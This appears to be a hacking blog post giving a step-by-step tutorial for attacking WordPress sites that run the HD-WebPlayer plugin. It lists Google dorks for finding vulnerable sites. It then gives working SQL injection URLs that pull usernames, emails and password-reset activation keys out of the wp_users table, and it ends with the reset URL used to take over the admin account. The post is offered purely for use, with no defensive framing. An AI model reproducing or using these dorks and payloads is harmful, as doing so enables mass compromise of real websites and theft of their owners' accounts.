Hello , After Writing Top 3 Premium Blogger Templates For Free
I was searching for some WordPress Exploits So I Found This Sql Injection Vulnerability In a Plugin Named HD-WebPlayer So now what is the Loop Hole ?
Lets Begin your First Step Is As Always to Find Vulnerable Site Using Google Dorks
For This Exploit Their are 3 Special Dorks :
Dork #1(config.php)inurl:"/wp-content/plugins/hd-webplayer/config.php?id="Dork #2 (playlist.php)inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="Dork #3 (General):inurl:"/wp-content/plugins/hd-webplayer/"
Use Google Dork To Find Vulnerable Site Like this :
Now You Found The Site So Lets Try To Inject It .
For Example :
For Example :
http://Site.com/wp-content/plugins/hd-webplayer/config.php?id=2
So Replace It With
http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--You Have To Add Below Url After Site.Com :
So Replace It With
wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
http://Site.com/wp-admin
After That Either Write Username Or Email Which You Got In Previous Step And Click Enter , Now Again U Have To Get The Authorization Code Which Has Been Sent To Admin's Email now Again U Have To Inject Now Add Below Code After Site Url Like http://Site.Com/
http://www.Site.Com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
wp-login.php?action=rp&key=YOUR_RESET_KEY&login=USERNAME
Post a Comment
Post a Comment